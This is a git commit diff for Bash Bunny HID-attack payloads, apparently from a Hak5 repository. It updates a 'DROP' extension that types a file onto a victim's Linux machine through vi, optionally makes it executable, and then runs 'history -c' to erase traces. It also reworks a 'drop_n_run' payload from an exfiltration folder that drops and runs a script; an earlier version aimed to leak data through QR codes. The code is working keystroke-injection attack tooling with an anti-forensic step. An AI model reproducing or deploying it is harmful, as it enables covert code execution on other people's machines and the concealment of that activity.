All Working with executable and overwite options

2018-01-27 18:33:25 -08:00 · 2018-01-27 18:33:25 -08:00 · b3b9f75200
parent 5c764849f3
commit b3b9f75200
4 changed files with 42 additions and 52 deletions
--- a/payloads/extensions/drop.sh
+++ b/payloads/extensions/drop.sh
@ -2,44 +2,55 @@
 #
 # DROP v1 by bg-wa
 # Simplifies dropping files from HID attacks for LINUX
-# Usage: DROP bb_source_file.txt attack_destination_file.txt [overwrite]
+# Usage: DROP bb_source_file.txt attack_destination_file.txt [overwrite: false] [executable: false]
 #
 # Example:
-# DROP /root/udisk/payloads/$SWITCH_POSITION/source.txt ~/target_destination.txt true
+# DROP /root/udisk/payloads/$SWITCH_POSITION/source.sh ~/target_destination.sh true true
 source ./run.sh
-source ./debug.sh

 function DROP() {
-    DEBUG "drop" "start"
-    local source=$2
-    local destination=$3
-    local overwrite=$4
-   #local os=
+    source=$1
+    destination=$2
+    overwrite=$3
+    executable=$4
+    #os=

-    RUN terminal
+    RUN UNITY xterm
    QUACK DELAY 1000
+
+    if "$overwrite" == "true"
+    then
+        QUACK STRING rm "$destination"
+        QUACK ENTER
+        QUACK DELAY 500
+    fi
    QUACK STRING vi "$destination"
    QUACK ENTER
    QUACK DELAY 500
    QUACK STRING i
-    ;;
-   
-   while IFS= read data
+
+    while IFS= read -r data
    do
-        if [ "${data}" = " " ]
-        then
-           QUACK SPACE
-        else
-           QUACK STRING "$data"
-        fi
+        QUACK STRING "$data"
+        QUACK ENTER
    done < "$source"

+    QUACK DELAY 500
    QUACK ESC
-    if $overwrite
-        QUACK STRING :wq!
-    else
-        QUACK STRING :wq
+    QUACK ENTER
+    QUACK STRING :wq
+    QUACK ENTER
+
+    if "$executable" == "true"
+    then
+        QUACK STRING chmod +x "$destination"
+        QUACK ENTER
+        QUACK DELAY 500
    fi
+
+    QUACK STRING history -c
+    QUACK ENTER
+    QUACK STRING exit
    QUACK ENTER
 }

--- a/payloads/library/exfiltration/drop_n_run/boom.html
+++ b/payloads/library/exfiltration/drop_n_run/boom.html
--- a/payloads/library/exfiltration/drop_n_run/fuse.sh
+++ b/payloads/library/exfiltration/drop_n_run/fuse.sh
@ -1,7 +1,7 @@
 #!/bin/bash

-# Get out of bed and do something productive here instead...
+# Wake up and do something productive here instead...
 sleep 10

-# Kaboom!!
-firefox "~/boom.html"
+# boom!!
+firefox "http://hak5.org"
--- a/payloads/library/exfiltration/drop_n_run/payload.txt
+++ b/payloads/library/exfiltration/drop_n_run/payload.txt
@ -4,12 +4,10 @@
 # Author:        bg-wa
 # Version:       1.0
 # Category:      HID
-# Target:        *NIX
+# Target:        UNITY
 # Attackmodes:   HID
 #
-# Quick HID only attack to write an HTML/JS file to target machine
-# and open a browser, to exfiltrate data Using QR Codes and a video
-# recording device.
+# Quick HID only attack to write a file to target machine and open
 #
 # | Attack Stage        | Description                              |
 # | ------------------- | ---------------------------------------- |
@ -21,17 +19,12 @@
 ATTACKMODE HID
 LED SETUP

-source_scipt="/root/udisk/payloads/${SWITCH_POSITION}/fuse.sh"
-target_script="~/fuse.sh"
-
-source_html="/root/udisk/payloads/${SWITCH_POSITION}/boom.html"
-target_html="~/boom.html"
+source_script=/root/udisk/payloads/$SWITCH_POSITION/fuse.sh
+target_script=\~/fuse.sh

 LED ATTACK

-DROP $source_script $target_script
-DROP $source_html $target_html
-RUN LINUX "${target_script}"
+DROP $source_script $target_script true true
+RUN UNITY $target_script

-Q ENTER
 LED FINISH